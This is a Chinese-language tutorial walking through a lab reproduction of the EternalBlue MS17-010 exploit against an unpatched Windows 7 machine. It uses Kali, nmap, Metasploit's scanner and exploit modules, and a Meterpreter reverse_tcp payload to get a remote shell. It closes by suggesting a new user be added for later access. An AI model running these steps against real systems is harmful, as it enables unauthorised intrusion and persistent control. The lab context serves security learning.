目录
1.知识点:
2.前提准备
3.复现
(永恒之蓝适应低版本的电脑没有打ms17_010的补丁,现在win7以上的高版本已经不可以使用)
百度百科:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
攻击方式 :
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。
本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。
msfconsole 简称 msf 是一款常用的安全测试工具,包含了各种常见的漏洞利用模块
1.kali攻击机
2windows 7 x64 :
安装win 7 只需要和物理机一样的步骤安装即可 要关闭防火墙
在任务开始前我们也先要知道两个机器的ip地址 kali使用ifconfig win7使用ipconfig
kali :192.168.1.222 win7:192.168.1.18
然后我们用kali机器对win7进行ping指令 看看能不能ping的通
发现ping得通于是我们可以开始复现永恒之蓝
kali打开终端 使用代码 nmap -sV 192.168.1.18
发现一个win7 的445端口的一个于是我们可以运用永恒之蓝 因为永恒之蓝就是运用445端口的漏洞进行攻击
我们运用msfconsole这个工具 是kali自带的
通过search ms17_010查找永恒之蓝的漏洞
0是永恒之蓝的攻击
3是永恒之蓝扫描模块
于是我们先复制3对我们的win7进行扫描
当我们输入auxiliary/scanner/smb/smb_ms17_010扫描模块后
还要输入我们要对的win7ip地址
运用set rhosts + IP地址的格式 如 set rhosts 192.168.1.18
然后run
得到了存在漏洞 Host is likely VULNERABLE to MS17-010! 说明我们可以运用 MS17-010漏洞进行注入
于是我们和运用扫描模块一样运用攻击模块
显示
No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
意思是未有效负载
百度后运用指令
set payload windows/x64/meterpreter/reverse_tcp
可以实现有效负载
执行成功
出现这个说明植入成功
于是我们可以对win7电脑进行访问
运用shell指令可以访问控制台
发现变成了windows的控制台的模式
于是我们可以对该电脑进行操作
比如创建一个文件夹 1
会发现我们创建了一个文件夹 1 实现了对win7电脑的控制
我们还可以创建新的用户 便于后期的操作
于是我们就可以在kali终端中运用cmd指令对win7电脑实现操作
到此 永恒之蓝漏洞复现结束。